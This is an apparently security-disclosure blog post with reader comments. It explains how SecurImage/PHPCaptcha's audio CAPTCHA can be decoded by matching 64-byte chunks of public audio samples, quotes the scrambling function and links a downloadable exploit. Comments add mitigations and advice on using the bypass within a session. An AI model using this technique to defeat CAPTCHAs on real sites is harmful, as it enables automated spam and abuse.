Recently I discovered an easy way to bypass PHPCaptcha also known as SecurImage. The method described below will break the CAPTCHA every time, without fail and affects versions 1.0.4 and above. Previous versions are also probably vulnerable tho only exploit code for the MP3 file format (implemented as default since version 2.0.0) is provided.
The flaw in the CAPTCHA stems from the way MP3 and WAV audio codes, intended for use by by the visually impaired, are generated. It is worth noting that even when the user of the site has removed the audio functionality from their displayed CAPTCHA the functionality can still be accessed via forceful browsing to the file called “/securimage_play.php”. This means that unless the administrator of the site has removed the securimage_play.php file that their site is vulnerable to attack.
The audio codes that are generated by PHPCaptcha are created by concatenating a set of audio files (that are publicly accessible in /audio directory). To prevent simple binary analysis of the output the author randomly changes the value of every 64th byte in the generated audio file starting from an initial offset that is also defined by a random integer in the range 1-64. The effect of the mutation means that when you listen to the audio its very hard to determine what letters are being heard. The code used for the mutation is shown below:
function scrambleAudioData(&$data, $format)
{
if ($format == 'wav') {
$start = strpos($data, 'data') + 4;
if ($start === false) $start = 44;
} else { // mp3
$start = 4;
}
$start += rand(1, 64);
$datalen = strlen($data) - $start - 256;
for ($i = $start; $i < $datalen; $i += 64) {
$ch = ord($data{$i});
if ($ch < 9 || $ch > 119) continue;
$data{$i} = chr($ch + rand(-8, 8));
}
}
While this prevents simple binary analysis of the generated audio it does not prevent an attacker from building a list of 64 byte strings from the publicly accessible audio samples and using these in comparison against the concatenated audio file. By determining where in the file these strings occur its possible to decode the CAPTCHA with a 100% success rate. The decision by the author to change only the 64th byte of the final audio file is a fatal design flaw.
You can download the PHPCaptcha exploit capable of decoding the MP3 CAPTCHA format. It is currently configured to run against the “sample_form.php” script that comes by default with SecurImage / PHPCaptcha. Below is a video of the exploit running:
No fix is currently available from the author. The only current solution is to remove the securimage_play.php script from your site.
Thanks so much Phil! Keep up the good hack.
**Two thumbs up.
Good one :D and thanks for bringing it to my notice! I’ll put up a warning against this too..
Cheers,
m^e
If you know how to patch this so the audio still works and can be secure, please contact me. http://www.fastsecurecontactform.com/contact
Thanks
Mike Challis
Hi Mike,
Without a substantial re-write of the audio component of securecaptcha there is no way to fix the script so that it cannot be decoded.
The author will need to put the same amount of effort in to mutating the audio as he has done for the visual component of the captcha. This is compounded by the fact that there doesnt appear to be any easy of generating MP3 files using PHP.
Phil.
The link to DLing the zip is dead.
Fixed, sorry about that.
Thanks for this entry. We are getting some spam and guessed that it could be caused by this exploit. We removed read-permissions from “securimage_play.php” -file, but spam is still coming through. Is it possible that there’s another similar bug ?
If your seeing a high hit rate for the secureimage_play.php file within your Apache web logs then its entirely possible the spammer is using this technique. As far as I’m aware there are no other issues with PHPCaptcha – you might want to try altering the parameters for the image generation to make the CAPTCHA harder to read although this won’t provide any protection against “Human Sweatshop Relay Attacks” such as deathbycaptcha.com. By combining Akismet (akismet.com) with your CAPTCHA you might be able to provide more defence in depth against spam.
Make sure that you have the .htaccess file filled with “deny from all” in your “/securimage/database/” folder.
If you are not using Apache as server, it’s possible that you need to set the exclusion manually on this folder/path for anyone except the dedicated user for running the PHP Scripts.
Wish this helps!
thanks for making it available to all hackers
It took him a long time, but PHPCaptcha 3.0 is out. Are you going to test it also?
PHPCaptcha version 3.0 is also vulnerable – exploit to follow shortly. Watch this space.
I’m watching… tested it yet? He claims that it “fixes a vulnerability with mp3 audio files”….
Similar problems exist with 3.0 – version 3.2 might actually be ok as far as the Audio goes :)
Any updates for the 3.0 exploit? Is there a proof of concept like this one?
Any updates on version 3.2? Has the issue been fixed? Any other vulnerabilities?
If you use a small audio set to generate a CAPTCHA you can easily decode it. Admittedly its not quite as simple as a binary comparison, you’ll need to turn the audio up into a spectrogram using an FFT and then compare it. These guys did it pretty well: http://www.dc949.org/projects/stiltwalker/
Is there any way to use this in a session? I have a session where I have to bypass a captcha in the middle of it.
You’ll have to fetch the Audio file using the same session ID that you use to submit the captcha protected form, in PHP curl is probably your best bet.
So does that mean hackers can still exploit the audio captcha in version 3.2? Any ways to prevent it?
Audio CAPTCHA don’t appear to be easy things to create, Ideally you need a huge audio library to make the classification of sounds harder – with SecurImage the sound library is ~30 sounds which makes classification easy. So hackers could exploit version 3.2. However, with the exception of Stiltwalker i’m not aware of any public exploits for it yet although its probably just a question of time.